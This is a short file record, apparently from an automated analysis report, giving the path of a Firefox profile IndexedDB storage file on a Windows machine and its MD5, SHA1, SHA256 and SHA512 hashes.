C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

MD5 effaec199bfdce25de21a1f4612a9dec
SHA1 a110d73b5df5bd3418ea0e5d26c75edfc5c0c0e3
SHA256 f385c2cee37e68b46680c455b151be6200b35041e4432c5dc79800efa6eefdd2
SHA512 7f5a1ff06bb01e076b8d5756319c58b1efe54170dd3207b35316ed94a2533cfa4e96be6909dd4945564c6b974d55489cc0f3b9c35a4217aab8cb6b7ccfc3df1a